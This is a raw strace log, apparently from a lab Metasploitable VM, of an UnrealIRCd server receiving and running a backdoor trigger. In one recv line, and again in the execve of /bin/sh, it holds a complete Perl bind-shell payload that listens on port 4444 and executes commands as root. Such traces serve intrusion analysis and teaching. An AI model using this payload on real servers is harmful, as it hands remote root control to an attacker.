4519  07:34:16.673573 select(1024, [2 3 4 7 9], [], NULL, {0, 820000}) = 1 (in [2], left {0, 630000})

4519  07:34:16.870059 clock_gettime(CLOCK_MONOTONIC, {2466, 687082217}) = 0

4519  07:34:16.870122 accept(2, 0, NULL) = 5

4519  07:34:16.870144 getpeername(5, {sa_family=AF_INET, sin_port=htons(43779), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:34:16.870179 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:34:16.870192 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:34:16.870223 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:34:16.870236 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:34:16.870247 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:34:16.870258 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:34:16.870272 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:34:16.870288 clock_gettime(CLOCK_MONOTONIC, {2466, 687301954}) = 0

4519  07:34:16.870300 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:34:16.870312 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:34:16.870322 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:34:16.870344 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:34:16.870355 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:34:16.870403 send(6, "\27\271\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:34:16.870440 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:34:16.870485 gettimeofday({1495625656, 870489}, NULL) = 0

4519  07:34:16.870497 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:34:16.875304 clock_gettime(CLOCK_MONOTONIC, {2466, 692321899}) = 0

4519  07:34:16.875321 recvfrom(6, "\27\271\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\326\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:34:16.875362 close(6)          = 0

4519  07:34:16.875377 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:34:16.875391 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:34:16.875450 time(NULL)        = 1495625656

4519  07:34:16.875463 time(NULL)        = 1495625656

4519  07:34:16.875475 gettimeofday({1495625656, 875479}, NULL) = 0

4519  07:34:16.875487 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:34:16.875516 clock_gettime(CLOCK_MONOTONIC, {2466, 692528641}) = 0

4519  07:34:16.875526 gettimeofday({1495625656, 875530}, NULL) = 0

4519  07:34:16.875537 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 970000})

4519  07:34:16.904557 clock_gettime(CLOCK_MONOTONIC, {2466, 721580039}) = 0

4519  07:34:16.904582 recv(4, "PRIVMSG  #testit BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 58

4519  07:34:16.904606 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904625 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904639 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904653 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904666 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904680 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904693 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904707 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904720 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904733 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904754 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904768 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904781 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904794 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904807 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904820 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904833 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904846 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904859 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904873 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904886 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904900 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:34:16.904957 gettimeofday({1495625656, 904962}, NULL) = 0

4519  07:34:16.904986 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:34:16.905043 clock_gettime(CLOCK_MONOTONIC, {2466, 722056312}) = 0

4519  07:34:16.905055 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:34:16.905082 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:34:16.905101 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:34:16.905113 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:34:16.905128 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10710

10710 07:34:16.905197 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10710 07:34:16.905211 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10710 07:34:16.905221 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10710 07:34:16.905234 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10710 07:34:16.905337 brk(0)            = 0x80f9000

10710 07:34:16.905361 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.905379 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f13000

10710 07:34:16.905395 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.905450 open("/etc/ld.so.cache", O_RDONLY) = 1

10710 07:34:16.905478 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10710 07:34:16.905496 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0b000

10710 07:34:16.905507 close(1)          = 0

10710 07:34:16.905517 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.905532 open("/lib/libncurses.so.5", O_RDONLY) = 1

10710 07:34:16.905545 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10710 07:34:16.905641 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10710 07:34:16.905658 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edb000

10710 07:34:16.905670 mmap2(0xb7f08000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f08000

10710 07:34:16.905686 close(1)          = 0

10710 07:34:16.905698 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.905711 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10710 07:34:16.905725 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10710 07:34:16.905812 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10710 07:34:16.905830 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ed7000

10710 07:34:16.905841 mmap2(0xb7ed9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ed9000

10710 07:34:16.905856 close(1)          = 0

10710 07:34:16.905867 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.905880 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10710 07:34:16.905894 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10710 07:34:16.906031 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10710 07:34:16.906048 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ed6000

10710 07:34:16.906062 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d87000

10710 07:34:16.906076 mmap2(0xb7ed0000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed0000

10710 07:34:16.906090 mmap2(0xb7ed3000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed3000

10710 07:34:16.906104 close(1)          = 0

10710 07:34:16.906126 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d86000

10710 07:34:16.906137 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d866b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10710 07:34:16.906197 mprotect(0xb7ed0000, 4096, PROT_READ) = 0

10710 07:34:16.906233 munmap(0xb7f0b000, 29913) = 0

10710 07:34:16.906259 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10710 07:34:16.906272 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10710 07:34:16.906292 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfda3760) = -1 ENOTTY (Inappropriate ioctl for device)

10710 07:34:16.906321 brk(0)            = 0x80f9000

10710 07:34:16.906331 brk(0x80fa000)    = 0x80fa000

10710 07:34:16.906342 brk(0x80fb000)    = 0x80fb000

10710 07:34:16.906358 getuid32()        = 0

10710 07:34:16.906367 getgid32()        = 0

10710 07:34:16.906375 geteuid32()       = 0

10710 07:34:16.906384 getegid32()       = 0

10710 07:34:16.906409 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10710 07:34:16.906451 time(NULL)        = 1495625656

10710 07:34:16.906464 brk(0x80fc000)    = 0x80fc000

10710 07:34:16.906510 brk(0x80fd000)    = 0x80fd000

10710 07:34:16.906529 open("/proc/meminfo", O_RDONLY) = 1

10710 07:34:16.906550 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10710 07:34:16.906568 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000

10710 07:34:16.906579 read(1, "MemTotal:      1035240 kB\nMemFree:        402240 kB\nBuffers:         78928 kB\nCached:         394440 kB\nSwapCached:          0 kB\nActive:         256608 kB\nInactive:       345688 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        402000 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4568 kB\nWriteback:           0 kB\nAnonPages:      128992 kB\nMapped:          52004 kB\nSlab:            19460 kB\nSReclaimable:    10860 kB\nSUnreclaim:       8600 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10710 07:34:16.906662 close(1)          = 0

10710 07:34:16.906673 munmap(0xb7f12000, 4096) = 0

10710 07:34:16.906684 brk(0x80fe000)    = 0x80fe000

10710 07:34:16.906709 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10710 07:34:16.906722 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10710 07:34:16.906734 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10710 07:34:16.906746 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10710 07:34:16.906757 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10710 07:34:16.906768 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10710 07:34:16.906781 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10710 07:34:16.906793 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10710 07:34:16.906805 uname({sys="Linux", node="metasploitable", ...}) = 0

10710 07:34:16.906852 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10710 07:34:16.906869 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10710 07:34:16.906887 brk(0x8100000)    = 0x8100000

10710 07:34:16.906910 getcwd("/etc/unreal", 4096) = 12

10710 07:34:16.906953 getpid()          = 10710

10710 07:34:16.906998 getppid()         = 4519

10710 07:34:16.907014 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10710 07:34:16.907035 stat64("/sbin/sh", 0xbfda3738) = -1 ENOENT (No such file or directory)

10710 07:34:16.907064 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10710 07:34:16.907081 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10710 07:34:16.907105 socket(PF_FILE, SOCK_STREAM, 0) = 1

10710 07:34:16.907117 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10710 07:34:16.907129 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10710 07:34:16.907150 close(1)          = 0

10710 07:34:16.907161 socket(PF_FILE, SOCK_STREAM, 0) = 1

10710 07:34:16.907171 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10710 07:34:16.907181 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10710 07:34:16.907198 close(1)          = 0

10710 07:34:16.907211 open("/etc/nsswitch.conf", O_RDONLY) = 1

10710 07:34:16.907225 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10710 07:34:16.907241 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f12000

10710 07:34:16.907252 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10710 07:34:16.907299 read(1, "", 4096) = 0

10710 07:34:16.907309 close(1)          = 0

10710 07:34:16.907318 munmap(0xb7f12000, 4096) = 0

10710 07:34:16.907333 open("/etc/ld.so.cache", O_RDONLY) = 1

10710 07:34:16.907345 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10710 07:34:16.907361 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0b000

10710 07:34:16.907371 close(1)          = 0

10710 07:34:16.907381 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.907406 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10710 07:34:16.907444 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10710 07:34:16.907545 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10710 07:34:16.907562 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7d000

10710 07:34:16.907574 mmap2(0xb7d84000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d84000

10710 07:34:16.907590 close(1)          = 0

10710 07:34:16.907601 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10710 07:34:16.907615 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10710 07:34:16.907628 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10710 07:34:16.907716 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10710 07:34:16.907733 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d65000

10710 07:34:16.907744 mmap2(0xb7d79000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d79000

10710 07:34:16.907758 mmap2(0xb7d7b000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d7b000

10710 07:34:16.907772 close(1)          = 0

10710 07:34:16.907797 munmap(0xb7f0b000, 29913) = 0

